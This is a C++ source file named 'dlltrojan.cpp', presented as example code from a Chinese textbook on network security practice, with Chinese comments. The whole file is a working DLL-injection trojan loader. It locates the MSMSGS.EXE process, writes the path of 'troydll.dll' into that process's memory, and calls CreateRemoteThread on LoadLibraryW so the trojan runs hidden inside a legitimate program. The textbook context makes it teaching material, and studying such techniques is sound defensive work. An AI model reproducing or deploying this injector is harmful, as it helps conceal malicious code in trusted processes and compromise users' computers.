dlltrojan.cpp

“网络安全技术实践与代码详解”实例代码

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h>

void CheckError ( int, int, char *); //出错处理函数
HANDLE hRemoteThread, hRemoteProcess; // 远程线程和进程句柄
PWSTR pszLibFileRemote=NULL; // 远程文件名
// 根据进程名获取进程ID
DWORD   GetProcessIdFromName(char *processname)   
{   
    
	HANDLE  hProcessSnap   =   NULL;     
	BOOL  bRet             =   FALSE;     
	PROCESSENTRY32   pe32  =   {0};     
	DWORD   processID; // 进程ID
	// 获得全部进程信息
	hProcessSnap  =  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,   0);     
	if   (hProcessSnap   ==   INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}
	pe32.dwSize   =   sizeof(PROCESSENTRY32);     
    // 从第一个进程开始遍历所有进程
	if  (Process32First(hProcessSnap, &pe32))
	{       
		HANDLE   hProcess;
		// 开始循环查找进程
		while   (Process32Next(hProcessSnap,   &pe32))
		{   
			// 找到符合进程名称的进程
			if (!strcmp(pe32.szExeFile,processname))
			{   
				// 打开进程
				hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);   
				CloseHandle(hProcess);
				// 获得进程ID
				processID = pe32.th32ProcessID;   
				break;   
			}   
		}   
	}   
	CloseHandle   (hProcessSnap);     
	return   processID; 
} 


void main(int argc,char **argv)

{

	int iReturnCode;
	
	char lpDllFullPathName[MAX_PATH];
	
	WCHAR pszLibFileName[MAX_PATH]={0};
	// 获取进程名为MSMSGS.EXE的进程ID
	DWORD dwRemoteProcessId = GetProcessIdFromName("MSMSGS.EXE"); 
	
	strcpy(lpDllFullPathName, "d:\\troydll.dll");
	
	//将DLL文件全路径的ANSI码转换成UNICODE码
	
	iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
		
		lpDllFullPathName, strlen(lpDllFullPathName),
		
		pszLibFileName, MAX_PATH);
	
	CheckError(iReturnCode, 0, "MultByteToWideChar");
	
	//打开远程进程
	
	hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程 
		
		PROCESS_VM_OPERATION | //允许VM操作
		
		PROCESS_VM_WRITE, //允许VM写
		
		FALSE, dwRemoteProcessId ); 
	
	CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
	
	//计算DLL路径名需要的内存空间
	
	int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
	
	pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, 
		NULL, 
		cb, 
		MEM_COMMIT, 
		PAGE_READWRITE);
	
	CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
	
	//将DLL的路径名复制到远程进程的内存空间
	
	iReturnCode = WriteProcessMemory(hRemoteProcess, 
		pszLibFileRemote, 
		(PVOID) pszLibFileName, 
		cb, 
		NULL);
	
	CheckError(iReturnCode, false, "WriteProcessMemory");
	
	//计算LoadLibraryW的入口地址 
	
	PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
		
		GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	
	CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
	
	//启动远程线程，通过远程线程调用用户的DLL文件 
	
	hRemoteThread = CreateRemoteThread( hRemoteProcess, 
		NULL, 
		0, 
		pfnStartAddr, 
		pszLibFileRemote, 
		0, NULL);
	
	CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
	
	//等待远程线程退出
	
	WaitForSingleObject(hRemoteThread, INFINITE);
	
	//清场处理
	
	if (pszLibFileRemote != NULL)
		
	{
		
		VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
		
	}
	
	if (hRemoteThread != NULL) 
		
	{
		
		CloseHandle(hRemoteThread );
		
	}
	
	if (hRemoteProcess!= NULL) 
		
	{
		
		CloseHandle(hRemoteProcess);
		
	}

}

//错误处理函数CheckError()

void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)

{

	if(iReturnCode==iErrorCode)
		
	{
		
		printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
		
		//清场处理
		
		if (pszLibFileRemote != NULL)
			
		{
			
			VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
			
		}
		
		if (hRemoteThread != NULL) 
			
		{
			
			CloseHandle(hRemoteThread );
			
		}
		
		if (hRemoteProcess!= NULL)
			
		{
			
			CloseHandle(hRemoteProcess);
			
		}
		
		exit(0);
		
	}

}